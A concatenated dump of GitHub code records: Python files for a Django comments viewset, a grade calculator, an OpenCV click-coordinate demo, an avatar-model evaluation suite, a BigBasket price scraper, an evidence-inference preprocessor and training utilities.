QueryModelViewSet\r\n\r\n\r\nclass UserCommentsQueryModelViewSet(QueryModelViewSet):\r\n \"\"\"QueryModelViewSet для работы с комментариями пользователя\"\"\"\r\n\r\n queryset = UserCommentsModel.objects.all().order_by('created')\r\n serializer_class = UserCommentsListModelSerializer\r\n permission_classes = [IsAuthenticated]\r\n pagination_class = None\r\n\r\n def list(self, request, *args, **kwargs):\r\n queryset = self.filter_queryset(self.get_queryset())\r\n if 'metricId' in request.query_params:\r\n metric_id = int(request.query_params.get('metricId'))\r\n metric_model = WeatherMetricsModel.objects.get(id=metric_id)\r\n queryset = self.queryset.filter(weather_metric=metric_model)\r\n\r\n serializer = self.get_serializer(queryset, many=True)\r\n return Response(serializer.data)\r\n","repo_name":"thebadfordota/Robolife2","sub_path":"backend/components/comments/views/user_comments_query_model_viewset.py","file_name":"user_comments_query_model_viewset.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"15674923903","text":"\r\n\r\na = []\r\nwhile True:\r\n flag = input(\"是否输入,若回答yes则继续输入,若回答no则停止输入\")\r\n if flag == \"yes\":\r\n while True:\r\n c = eval(input(\"请输入成绩:\"))\r\n if c < 0 or c > 100:\r\n print(\"输入错误,请重新输入\")\r\n else:\r\n a.append(c)\r\n break\r\n elif flag == \"no\":\r\n break\r\n\r\ngeshu = len(a)\r\nzongfen = 0\r\nfor i in a:\r\n zongfen = zongfen + i\r\npingjunfen = zongfen/geshu\r\nzuigao = max(a)\r\n\r\nprint(\"共输入了\", geshu, \"个成绩\", \"总成绩为\", zongfen,\r\n \"平均分为\", pingjunfen, \"最高分为\", zuigao)\r\n","repo_name":"qaq112233/PythonWork","sub_path":"第10周/31计算成绩.py","file_name":"31计算成绩.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"22419068715","text":"import cv2\nprint(cv2.__version__)\nevt=-1\ncoord=[]\ndef click(event,x,y,flag,params):\n global pnts\n global evt\n if event==cv2.EVENT_LBUTTONDOWN:\n print('Mouse Event Was: ',event)\n print(x,',',y)\n pnts=(x,y)\n coord.append(pnts)\n print(coord)\n evt=event\ndispW=640\ndispH=480\nflip=0\ncv2.namedWindow('picam')\ncv2.setMouseCallback('picam',click)\n#Uncomment These next Two Line for Pi Camera\ncamSet='nvarguscamerasrc ! video/x-raw(memory:NVMM), width=3264, height=2464, format=NV12, framerate=21/1 ! nvvidconv flip-method='+str(flip)+' ! video/x-raw, width='+str(dispW)+', height='+str(dispH)+', format=BGRx ! videoconvert ! video/x-raw, format=BGR ! appsink'\ncam= cv2.VideoCapture(camSet)\n \n#Or, if you have a WEB cam, uncomment the next line\n#(If it does not work, try setting to '1' instead of '0')\n#cam=cv2.VideoCapture(0)\nwhile True:\n ret, frame = cam.read()\n for pnts in coord:\n cv2.circle(frame,pnts,5,(0,255,255),-3)\n font=cv2.FONT_HERSHEY_PLAIN\n myStr=str(pnts)\n cv2.putText(frame,myStr,pnts,font,1,(0,0,0),2)\n cv2.imshow('picam',frame)\n cv2.moveWindow('picam',0,0)\n keyEvent=cv2.waitKey(1)\n if keyEvent==ord('q'):\n break\n if keyEvent==ord('c'):\n coord=[]\ncam.release()\ncv2.destroyAllWindows()\n ","repo_name":"ANGELARIELPLAZA/CURSO-JETSON-NANO","sub_path":"CURSO_JETSON_NANO_IA/JETSON_NANO/opencv/opencv-coordenadas.py","file_name":"opencv-coordenadas.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37105642704","text":"import sys\n\ninput_str=sys.stdin.readline().strip()\nalpabet=[[0 for j in range(len(input_str)+1)] for i in range(26)]\nq_count=int(sys.stdin.readline().strip())\n\n#알파벳의 아스키코드를 이용하여 알파벳들의 위치를 저장한다.\nfor k in range(len(input_str)):\n alpabet[ord(input_str[k])-97][k+1]=1\n\n#알파벳의 아스키코드를 이용하여 알파벳들의 prefix count를 구한다.\nfor a in range(26):\n for j in range(len(input_str)):\n alpabet[a][j+1]=alpabet[a][j]+alpabet[a][j+1]\n\n#출력한다.\nfor b in range(q_count):\n c,start,end=sys.stdin.readline().split()\n print(alpabet[ord(c)-97][int(end)+1]-alpabet[ord(c)-97][int(start)])","repo_name":"styughjvbn/Algorithm_study","sub_path":"week1-10/week1/3_16139.py","file_name":"3_16139.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24432054714","text":"from nha.evaluation import metrics as nha_metrics\nimport torch.nn as nn\nimport nha.models\nfrom nha.util.general import *\nfrom nha.data.real import digitize_segmap\n\nimport torch\nimport torchvision.transforms.functional as ttF\n\nfrom typing import *\nfrom tqdm import tqdm\nfrom collections import OrderedDict\n\n\nclass Evaluator:\n \"\"\"\n class to conveniently calculate various scores for predicted images.\n Attention: Keep in mind to blur mask before doing alpha merging such\n that CPBD (sharpness evaluation) is not influenced by these edge artifacts!\n \"\"\"\n\n def __init__(\n self,\n metrics=[\"L1\", \"L2\", \"PSNR\", \"MS_SSIM\", \"LMK\", \"LPIPS\", \"CPBD\"],\n device=\"cuda\",\n load_bbx_detector=False,\n ):\n \"\"\"\n :param metrics: a list of metrics to include in the evaluation process\n :param device: where to run the evaluation\n \"\"\"\n\n # ensures that if LMK in metrics, its calculated first such that bbs that were detected on the way can be reused\n self._metrics = OrderedDict()\n if \"LMK\" in [m.upper() for m in metrics]:\n metrics = list(metrics)\n metrics.remove(\"LMK\")\n metrics = [\"LMK\"] + metrics\n\n self._device = device\n self._bbx_detector = (\n nha_metrics.FaceBBxDetector(device) if load_bbx_detector else None\n )\n\n for m in metrics:\n m = m.upper()\n if m == \"LMK\":\n self._metrics[\"LMK\"] = nha_metrics.EuclLmkDistance(device)\n elif m == \"L1\":\n self._metrics[\"L1\"] = nn.L1Loss(reduction=\"none\")\n elif m == \"L2\":\n self._metrics[\"L2\"] = nn.MSELoss(reduction=\"none\")\n elif m == \"MS_SSIM\":\n self._metrics[\"MS_SSIM\"] = nha_metrics.MS_SSIM(device)\n elif m == \"PSNR\":\n self._metrics[\"PSNR\"] = nha_metrics.PSNR(device)\n elif m == \"LPIPS\":\n self._metrics[\"LPIPS\"] = nha_metrics.LPIPS(device)\n elif m == \"CPBD\":\n self._metrics[\"CPBD\"] = nha_metrics.CPBD(device)\n\n def __call__(\n self,\n pred: torch.Tensor,\n gt: torch.Tensor,\n reduction=\"none\",\n bbs=None,\n gt_landmarks=None,\n ):\n \"\"\"\n returns dictionary with evaluation scores for L1, L2, PSNR, MS_SSIM, LMK, LPIPS, CPBD.\n If reduction==\"none\", each dictionary value is a torch tensor of length N.\n If reduction in [\"mean\", \"sum\"], dict values are scalar tensors\n :param pred: torch tensor of shape N x 3 x H x W with entries -1 ... +1\n todo add predicted landmarks\n :param gt: torch.tensor of shape N x 3 x H x W with entries -1 ... +1\n :param bbs: None or np array of shape N x 5\n :param gt_landmarks: None or np array of shape N x 68 x 2\n :param reduction: How to reduce scores along N dim. One of\n - \"none\": no reduction, scores will have length N\n - \"mean\": scalar scores\n :return:\n \"\"\"\n\n scores = dict()\n pred = pred.to(self._device)\n gt = gt.to(self._device)\n\n for name, metric in self._metrics.items():\n if name in [\"L1\", \"L2\"]:\n scores[name] = torch.flatten(metric(pred, gt), start_dim=1).mean(dim=-1)\n elif name == \"LMK\":\n scores[name], bbs = metric(pred, gt, return_bbs=True, bbs=bbs)\n elif name == \"CPBD\":\n scores[name] = metric(pred)\n else:\n scores[name] = metric(pred, gt)\n\n if reduction == \"mean\":\n for key, val in scores.items():\n scores[key] = torch.mean(val)\n if reduction == \"sum\":\n for key, val in scores.items():\n scores[key] = torch.sum(val)\n\n return scores\n\n\n@torch.no_grad()\ndef evaluate_models(\n models: OrderedDict,\n dataloader,\n metrics=[\"L1\", \"L2\", \"PSNR\", \"MS_SSIM\", \"LMK\", \"LPIPS\", \"CPBD\"],\n blur_seg=0.0,\n):\n \"\"\"\n evaluates the performances of several models and creates a comparison dictionary. Keys are the same as given in\n 'models'; vals are dictionaries with keys:\n - [Metric] ... contains evaluated metrics score as float\n\n :param models: dict where key are the model names, each value is another dict with keys\n 'ckpt' (path to checkpoint file) and 'type' str model type identifier as defined in\n nha.util.models.__init__\n e.g.: {\"model_A\": \"/path/to/checkpoint\"},\n \"model_B\": ..., }\n\n\n :param dataloader: validation dataloader\n :param blur_seg: specifies factor to blur segmentation masks by before doing bg filling. If 0 has no effect. May\n be used for more useful cpbd score evaluation\n :param debug: if true: plots example of compared prediction - gt image pair\n :return: dict with following structure:\n {\"MODEL_NAME\":\n {\"SCORE_NAME\": score value (as float),\n }\n ...,\n }\n \"\"\"\n\n evaluator = Evaluator(metrics=metrics)\n scores = OrderedDict()\n\n for model_name, ckpt in models.items():\n # loading model\n model = nha.models.nha_optimizer.NHAOptimizer.load_from_checkpoint(ckpt).cuda()\n model.eval()\n\n # evaluation:\n scores[model_name] = OrderedDict()\n for batch in tqdm(\n iterable=dataloader, desc=f\"Quantitative Analysis of '{model_name}'\"\n ):\n batch = dict_2_device(batch, model.device)\n\n # get prediction\n pred_rgba = model.forward(batch)\n pred_rgb, pred_mask = pred_rgba[:, :3], pred_rgba[:, 3:]\n\n # get gt\n gt_rgb = batch[\"rgb\"]\n gt_mask = digitize_segmap(batch[\"seg\"]).float()\n gt_rgb = fill_tensor_background(gt_rgb, gt_mask)\n\n # blur masks if specified:\n if blur_seg > 0:\n pred_mask = ttF.gaussian_blur(\n pred_mask, 2 * int(2 * blur_seg) + 1, blur_seg\n )\n gt_mask = ttF.gaussian_blur(\n gt_mask, 2 * int(2 * blur_seg) + 1, blur_seg\n )\n\n pred_rgb = fill_tensor_background(pred_rgb, pred_mask)\n gt_rgb = fill_tensor_background(gt_rgb, gt_mask)\n\n # evaluate image\n scores[model_name] = cat_torch_dicts(\n scores[model_name], evaluator(pred_rgb, gt_rgb)\n )\n\n # calculating average score for evaluation metrics\n for key, val in scores[model_name].items():\n scores[model_name][key] = val.mean().detach().cpu().item()\n\n return scores\n","repo_name":"philgras/neural-head-avatars","sub_path":"nha/evaluation/eval_suite.py","file_name":"eval_suite.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":462,"dataset":"github-code","pt":"32"} +{"seq_id":"1475376827","text":"from openapi.utils import extend_schema_tags\n\ntag = 'extension'\npath = tag\nname = '插件配置'\n\nextend_schema_tags(\n tag,\n name,\n {\n 'type':'dashboard_page',\n 'init': {\n 'path': '/api/v1/marketplace/',\n 'method': 'get'\n },\n 'local': {\n 'install': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/',\n 'method': 'post',\n 'description': '点击安装'\n },\n 'update': {\n 'tag': 'extension.update',\n 'description': '编辑'\n },\n 'delete': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'delete',\n 'description': '删除'\n }\n }\n }\n)\n\nextension_update_tag = 'extension.update'\nextension_update_name = '编辑系统插件'\n\nextend_schema_tags(\n extension_update_tag,\n extension_update_name,\n {\n 'type': 'form_page',\n 'init': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'get'\n },\n 'global': {\n 'update': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'put',\n 'description': '确定'\n }\n }\n }\n)","repo_name":"0079123/arkid","sub_path":"api/v1/pages/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"1458225480","text":"#This program has been created to extract the prices from Big Basket\n#It currently can extract the prices only from the category list of products, eg. Friuts and Vegetables\n#Urls of the pages has to be proived in the excel-urls.csv present in the main project folder\n#DO NOT CHANGE THE NAME/EXTENSION OF urls.csv\n#This program generates an output file-prices-(date-time).csv, which extracts the product item, mrp and final price\n\nimport scrapy\nimport csv\nfrom itertools import zip_longest\nimport datetime\nimport re\nimport json\nfrom selenium import webdriver \nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nclass ProductPriceSpider(scrapy.Spider):\n\tname = \"bigbasket\"\n\n\tdef __init__(self):\n\t\tself.driver = webdriver.Chrome('/usr/bin/chromedriver')\n\t\t\t\t\t \n\tdef start_requests(self):\n\t\t#List of all urls to be searched. Commenting below code for testing \n\t\turls = []\n\n\t\t#reading input csv file\n\t\tfileName = \"urls.csv\"\n\t\twith open(fileName, 'r') as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\turls.append(line)\n\n\t\tself.log(urls) \n\n\t\t#start extracting for all urls\n\t\tfor url in urls:\n\t\t\tself.log(url)\n\t\t\tyield scrapy.Request(url=url, callback=self.parse_link)\n\n\t#Parser specific for bigbasket htmls\n\t#Parser extracts item product name, quantity, MRP and final price\n\tdef parse_link(self, response):\t\t\t\n\t\tself.log(response.url)\n\t\tself.driver.get(response.url)\n\t\t\n\t\t#For list of subcategories of items wait for 15secs or until element is loaded\n\t\titems = WebDriverWait(self.driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.tab-content div.item.prod-deck.row.ng-scope div.clearfix div.ng-scope\"))\n\t\t)\n\t\t\n\t\t#For individual product\n\t\titem = WebDriverWait(self.driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.uiv2-product-detail-content.wid-250\"))\n\t\t)\n\t\n\t\tif items:\n\t\t\tself.log(\"Inside items\")\n\t\t\t#Product title rows\n\t\t\tproduct_titles = []\n\t\t\ttitle_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div/a')\n\t\t\t#Extract only the required value from the string\n\t\t\tfor row in title_rows:\n\t\t\t\tproduct_titles.append(row.get_attribute('text'))\n\t\t\tself.log(product_titles)\n\n\t\t\t#Product measurement rows\n\t\t\tproduct_measures = []\n\t\t\tmeasure_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[2]/div//span[1]/span[@ng-bind=\"vm.selectedProduct.w\"]')\n\t\t\t#Extract only the required value from the string\n\t\t\tfor row in measure_rows:\n\t\t\t\tproduct_measures.append(row.text)\n\t\t\tself.log(product_measures)\n\t\t\t\n\t\t\t#Product MRP rows\n\t\t\tproduct_mrps = []\n\t\t\tmrp_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[3]/div/div/h4/span[1]/span')\n\t\t\t#Extract only the MRP from the string\t\n\t\t\tfor row in mrp_rows:\n\t\t\t\tproduct_mrps.append(row.text)\n\t\t\tself.log(product_mrps)\n\n\t\t\t#Product final prize rows\n\t\t\tproduct_prices = []\n\t\t\toffer_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[3]/div/div[1]/h4/span[2]/span')\n\t\t\t#Extract the final price from the string\t\n\t\t\tfor row in offer_rows:\n\t\t\t\tproduct_prices.append(row.text)\n\t\t\tself.log(product_prices)\n\n\t\telif item is not None:\n\t\t\tself.log(\"Inside item\")\n\t\t\t#Product title rows\n\t\t\tproduct_titles = []\n\t\t\ttitle = self.driver.find_element(By.XPATH, '//*[@id=\"slidingProduct*\"]/div[2]/div[2]/h1').text\n\t\t\tproduct_titles.append(title)\n\t\t\tself.log(product_titles)\n\n\t\t\t#Product measurement rows\n\t\t\tproduct_measures = []\n\t\t\t#measure = self.driver.find_element(By.CSS_SELECTOR, \"div.uiv2-product-detail-content.wid-250 div.uiv2-product-size div.uiv2-size-variants label\").split(\"

    \", \"\")\n\n\ndef extract_text_from_prompts(prompts_df):\n I, C, O = prompts_df['Intervention'].values, prompts_df['Comparator'].values, prompts_df['Outcome'].values\n all_prompt_text = [s.lower() for s in np.concatenate([I, C, O])]\n return all_prompt_text\n\n\ndef get_inference_vectorizer(article_ids=None, sections_of_interest=None, vocabulary_file=None):\n\n # if article_ids is None, will use all articles\n # in the CSV passed to the read_in_articles method.\n articles = read_in_articles(article_ids=article_ids)\n raw_texts = [extract_raw_text(article, sections_of_interest) for article in articles]\n\n # we also use the prompts text to construct our vectorizer\n prompts = read_prompts()\n raw_prompt_text = \" \".join(extract_text_from_prompts(prompts))\n\n raw_texts.append(raw_prompt_text)\n\n # there is at least one prompt with tokens short enough that CountVectorizer's default destroys it, so we allow any single character through.\n if vocabulary_file is not None:\n with open(vocabulary_file, 'r') as vf:\n vocab = [line.strip() for line in vf]\n vectorizer = CountVectorizer(vocabulary=vocab, token_pattern=r\"\\b\\w+\\b\")\n print(\"Loaded {} words from vocab file {}\".format(len(vocab), vocabulary_file))\n else:\n vectorizer = CountVectorizer(max_features=20000, token_pattern=r\"\\b\\w+\\b\")\n vectorizer.fit(raw_texts)\n tokenizer = vectorizer.build_tokenizer() \n\n str_to_idx = vectorizer.vocabulary_\n str_to_idx[SimpleInferenceVectorizer.PAD] = max(vectorizer.vocabulary_.values())\n str_to_idx[SimpleInferenceVectorizer.UNK] = str_to_idx[SimpleInferenceVectorizer.PAD]+1\n \n # note that for now the vectorizer is fit using only the\n # article texts (i.e., the vocab is based on words in full-texts,\n # not in prompts necessarily).\n return SimpleInferenceVectorizer(str_to_idx, tokenizer)\n\n\ndef read_annotations():\n anno_df = pd.read_csv(anno_csv_path)\n # we need to force EVIDENCE_COL_NAME to be strings in all cases; pandas occasionally reads some values as floats.\n anno_df = anno_df[anno_df.apply(lambda row: bool(row[VALID_LABEL]) and bool(row[VALID_REASONING]) and len(str(row[EVIDENCE_COL_NAME])) > 0 and row[LABEL] != 'invalid prompt', axis=1)]\n #annos[~annos[\"Answer_Val\"].isin([-1, 0, 1])]\n # TODO revisit this; right now just overwriting for convienence\n # anno_df[\"Answer_Val\"].replace({3:0}, inplace=True)\n return anno_df\n\n\ndef read_prompts():\n prompts_df = pd.read_csv(prompts_csv_path)\n prompts_df = prompts_df[prompts_df.apply(lambda row: all(map(lambda x: type(x) == str and x is not None and bool(x.strip()), [row['Comparator'], row['Intervention'], row['Outcome']])), axis=1)]\n return prompts_df \n\ndef assemble_Xy_for_prompts(training_prompts, inference_vectorizer, lbls_too=False, annotations=None, sections_of_interest=None, include_sentence_span_splits=False, include_raw_texts=False): \n Xy = []\n for prompt_id in training_prompts[PROMPT_ID_COL_NAME].values:\n if lbls_too:\n Xy_dict = inference_vectorizer.vectorize(training_prompts, prompt_id, \n include_lbls=True, annotations_df=annotations, sections_of_interest=sections_of_interest, \n include_sentence_span_splits=include_sentence_span_splits, include_raw_text=include_raw_texts)\n else:\n Xy_dict = inference_vectorizer.vectorize(training_prompts, prompt_id, sections_of_interest=sections_of_interest, \n include_sentence_span_splits=include_sentence_span_splits, include_raw_text=include_raw_texts)\n Xy.append(Xy_dict)\n return Xy\n\n\ndef _read_ids(f):\n with open(f, 'r') as tf:\n ids = list(int(x.strip()) for x in tf.readlines())\n ids_dict = OrderedDict()\n for x in ids:\n ids_dict[x] = x\n return set(ids_dict.keys())\n\ndef train_document_ids():\n \"\"\" Returns the set of document ids for a fixed training set \"\"\"\n return _read_ids(_train_id_file)\n\ndef validation_document_ids():\n \"\"\" Returns the set of document ids for a fixed validation set \"\"\"\n return _read_ids(_validation_id_file)\n\ndef test_document_ids():\n \"\"\" Returns the set of documents for a fixed test set \"\"\"\n return _read_ids(_test_id_file)\n\ndef get_train_Xy(train_doc_ids, sections_of_interest=None, vocabulary_file=None, include_sentence_span_splits=False, include_raw_texts=False):\n \"\"\" Loads the relevant documents, builds a vectorizer, and returns a list of training instances\"\"\"\n prompts = read_prompts()\n annotations = read_annotations()\n\n\n # filter out prompts for which we do not have annotations for whatever reason\n # this was actually just one case; not sure what was going on there.\n def have_annotations_for_prompt(prompt_id):\n return len(annotations[annotations[PROMPT_ID_COL_NAME] == prompt_id]) > 0\n\n prompts = [prompt for row_idx, prompt in prompts.iterrows() if \n have_annotations_for_prompt(prompt[PROMPT_ID_COL_NAME])]\n prompts = pd.DataFrame(prompts)\n\n inference_vectorizer = get_inference_vectorizer(article_ids=train_doc_ids, sections_of_interest=sections_of_interest, vocabulary_file=vocabulary_file)\n\n training_prompts = prompts[prompts[STUDY_ID_COL].isin(train_doc_ids)]\n\n training_prompts = pd.DataFrame(training_prompts)\n train_Xy = assemble_Xy_for_prompts(training_prompts, inference_vectorizer, lbls_too=True, annotations=annotations, include_sentence_span_splits=include_sentence_span_splits, include_raw_texts=include_raw_texts)\n\n return train_Xy, inference_vectorizer\n\n\ndef get_Xy(docids, inference_vectorizer: 'SimpleInferenceVectorizer', sections_of_interest=None, include_sentence_span_splits=False, include_raw_texts=False):\n prompts = read_prompts()\n annotations = read_annotations()\n\n # filter out prompts for which we do not have annotations for whatever reason\n # this was actually just one case; not sure what was going on there.\n def have_annotations_for_prompt(prompt_id):\n return len(annotations[annotations[PROMPT_ID_COL_NAME] == prompt_id]) > 0\n\n prompts = [prompt for row_idx, prompt in prompts.iterrows() if\n have_annotations_for_prompt(prompt[PROMPT_ID_COL_NAME])]\n prompts = pd.DataFrame(prompts)\n\n prompts = prompts[prompts[STUDY_ID_COL].isin(docids)]\n Xy = assemble_Xy_for_prompts(prompts, inference_vectorizer, lbls_too=True, annotations=annotations, sections_of_interest=sections_of_interest, include_sentence_span_splits=include_sentence_span_splits, include_raw_texts=include_raw_texts)\n return Xy\n\n\nclass SimpleInferenceVectorizer:\n UNK = \"\"\n PAD = \"\"\n\n def __init__(self, str_to_idx, tokenizer):\n self.str_to_idx = str_to_idx\n self.idx_to_str = [None]*(len(self.str_to_idx))\n self.sentence_splits = {} # map of article ids to array of sentence splits\n self.token_evidence = {}\n \n for w, idx in self.str_to_idx.items():\n try:\n self.idx_to_str[idx] = w \n except:\n import pdb; pdb.set_trace()\n\n self.tokenizer = tokenizer\n\n def string_to_seq(self, s):\n tokenized = self.tokenizer(s)\n unk_idx = self.str_to_idx[SimpleInferenceVectorizer.UNK]\n vectorized = [self.str_to_idx.get(token, unk_idx) for token in tokenized]\n return np.array(vectorized)\n\n def vectorize(self, prompts_df, prompt_id, include_lbls=False, annotations_df=None, sections_of_interest=None, \n include_sentence_span_splits=False, include_raw_text=False):\n \"\"\"\n Vectorize the prompt specified by the ID.\n \"\"\"\n if include_lbls and annotations_df is None:\n raise ValueError(\"When including annotations, they must already be defined\")\n\n prompt = prompts_df[prompts_df[PROMPT_ID_COL_NAME]==prompt_id]\n\n ###\n # vectorize the article itself.\n article_id = str(prompt[STUDY_ID_COL].values[0])\n article = get_article(article_id)\n article_text = extract_raw_text(article, sections_of_interest)\n article_text = article_text.lower()\n vectorized_article = self.string_to_seq(article_text)\n \n ###\n # and now vectorize the prompt (I/C/O)\n I_v = self.string_to_seq(prompt[\"Intervention\"].values[0].lower())\n C_v = self.string_to_seq(prompt[\"Comparator\"].values[0].lower())\n O_v = self.string_to_seq(prompt[\"Outcome\"].values[0].lower())\n\n return_dict = {\"article\":vectorized_article, \"I\":I_v, \"C\":C_v, \"O\":O_v, \"a_id\": article_id, \"p_id\": prompt_id}\n\n if include_lbls:\n # then also read out the labels.\n assert (annotations_df is not None)\n annotations_for_prompt = annotations_df[annotations_df[PROMPT_ID_COL_NAME] == prompt_id]\n labels = annotations_for_prompt[[LBL_COL_NAME,EVIDENCE_COL_NAME]].values\n return_dict[\"y\"] = labels\n # remove html tags\n for l in labels:\n parser.feed(str(l[1]))\n l[1] = parser.get_data()\n \n spans = annotations_for_prompt[[EVIDENCE_START,EVIDENCE_END]].values\n if len(spans) > 0 and sections_of_interest is None:\n # split into sentences, find which are evidence, and also encode all.\n sentence_spans = []\n if include_raw_text or include_sentence_span_splits:\n sen = split_into_sentences(article_id, article_text, self.sentence_splits)\n if include_raw_text:\n return_dict[\"all_article_sentences\"] = sen \n\n if include_sentence_span_splits:\n tmp = find_span_location(sen, [s[0] for s in spans], [e[1] for e in spans])\n for t in tmp:\n sentence_spans.append([self.string_to_seq(t[0]), t[1]])\n \n # encode the evidence spans \n evidence_spans = set()\n for start, end in spans:\n article_before_span = article_text[:int(start)]\n # +1 because the slice gets every character (and therefore token) *before* the evidence, so we want to offset the token count by 1 to actually start in the evidence\n span_start_idx = len(self.tokenizer(article_before_span)) + 1\n article_at_end_of_span = article_text[:int(end)]\n span_end_idx = len(self.tokenizer(article_at_end_of_span))\n evidence_spans.add((span_start_idx, span_end_idx))\n \n return_dict['sentence_span'] = sentence_spans \n return_dict['evidence_spans'] = evidence_spans\n if include_sentence_span_splits:\n return_dict['token_ev_labels'] = gen_exact_evid_array(sentence_spans, evidence_spans, return_dict, self.idx_to_str)\n \n return return_dict\n\n def decode(self, v):\n return [self.idx_to_str[idx] for idx in v]\n","repo_name":"jayded/evidence-inference","sub_path":"evidence_inference/preprocess/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":16616,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"32"} +{"seq_id":"102199253","text":"import atexit\nimport functools\nimport logging\nimport os\nimport random\nimport sys\nfrom collections import defaultdict\nfrom dataclasses import fields, is_dataclass\nfrom typing import Any, Mapping, Protocol, runtime_checkable\n\nimport hydra\n\nimport numpy as np\nimport torch\nimport torch.distributed as dist\nfrom iopath.common.file_io import g_pathmgr\nfrom omegaconf import OmegaConf\n\n\ndef register_omegaconf_resolvers():\n OmegaConf.register_new_resolver(\"get_method\", hydra.utils.get_method)\n OmegaConf.register_new_resolver(\"get_class\", hydra.utils.get_class)\n OmegaConf.register_new_resolver(\"times\", lambda x, y: x * y)\n OmegaConf.register_new_resolver(\"divide\", lambda x, y: x / y)\n OmegaConf.register_new_resolver(\"range\", lambda x: list(range(x)))\n OmegaConf.register_new_resolver(\"int\", lambda x: int(x))\n\n\ndef setup_distributed_backend(backend):\n \"\"\"\n Initialize torch.distributed and set the CUDA device.\n Expects environment variables to be set as per\n https://pytorch.org/docs/stable/distributed.html#environment-variable-initialization\n along with the environ variable \"LOCAL_RANK\" which is used to set the CUDA device.\n This is run inside a new process, so the cfg is reset and must be set explicitly.\n \"\"\"\n local_rank = int(os.environ[\"LOCAL_RANK\"])\n torch.distributed.init_process_group(backend=backend)\n\n\ndef get_machine_local_and_dist_rank():\n \"\"\"\n Get the distributed and local rank of the current gpu.\n \"\"\"\n local_rank = int(os.environ.get(\"LOCAL_RANK\", None))\n distributed_rank = int(os.environ.get(\"RANK\", None))\n assert (\n local_rank is not None and distributed_rank is not None\n ), \"Please the set the RANK and LOCAL_RANK environment variables.\"\n return local_rank, distributed_rank\n\n\ndef print_cfg(cfg):\n \"\"\"\n Supports printing both Hydra DictConfig and also the AttrDict config\n \"\"\"\n logging.info(\"Training with config:\")\n logging.info(OmegaConf.to_yaml(cfg))\n\n\ndef set_seeds(seed_value, max_epochs, dist_rank):\n \"\"\"\n Set the python random, numpy and torch seed for each gpu. Also set the CUDA\n seeds if the CUDA is available. This ensures deterministic nature of the training.\n \"\"\"\n # Since in the pytorch sampler, we increment the seed by 1 for every epoch.\n seed_value = (seed_value + dist_rank) * max_epochs\n logging.info(f\"MACHINE SEED: {seed_value}\")\n random.seed(seed_value)\n np.random.seed(seed_value)\n torch.manual_seed(seed_value)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(seed_value)\n\n\ndef makedir(dir_path):\n \"\"\"\n Create the directory if it does not exist.\n \"\"\"\n is_success = False\n try:\n if not g_pathmgr.exists(dir_path):\n g_pathmgr.mkdirs(dir_path)\n is_success = True\n except BaseException:\n logging.info(f\"Error creating directory: {dir_path}\")\n return is_success\n\n\ndef is_dist_avail_and_initialized():\n if not dist.is_available():\n return False\n if not dist.is_initialized():\n return False\n return True\n\n\ndef get_amp_type(amp_type: str):\n\n assert amp_type in [\"bfloat16\", \"float16\"], \"Invalid Amp type.\"\n\n if amp_type == \"bfloat16\":\n return torch.bfloat16\n else:\n return torch.float16\n\n\n@runtime_checkable\nclass _CopyableData(Protocol):\n def to(self, device: torch.device, *args: Any, **kwargs: Any):\n \"\"\"Copy data to the specified device\"\"\"\n ...\n\n\ndef _is_named_tuple(x) -> bool:\n return isinstance(x, tuple) and hasattr(x, \"_asdict\") and hasattr(x, \"_fields\")\n\n\ndef copy_data_to_device(data, device: torch.device, *args: Any, **kwargs: Any):\n \"\"\"Function that recursively copies data to a torch.device.\n\n Args:\n data: The data to copy to device\n device: The device to which the data should be copied\n args: positional arguments that will be passed to the `to` call\n kwargs: keyword arguments that will be passed to the `to` call\n\n Returns:\n The data on the correct device\n \"\"\"\n\n if _is_named_tuple(data):\n return type(data)(\n **copy_data_to_device(data._asdict(), device, *args, **kwargs)\n )\n elif isinstance(data, (list, tuple)):\n return type(data)(copy_data_to_device(e, device, *args, **kwargs) for e in data)\n elif isinstance(data, defaultdict):\n return type(data)(\n data.default_factory,\n {\n k: copy_data_to_device(v, device, *args, **kwargs)\n for k, v in data.items()\n },\n )\n elif isinstance(data, Mapping):\n return type(data)(\n {\n k: copy_data_to_device(v, device, *args, **kwargs)\n for k, v in data.items()\n }\n )\n elif is_dataclass(data) and not isinstance(data, type):\n new_data_class = type(data)(\n **{\n field.name: copy_data_to_device(\n getattr(data, field.name), device, 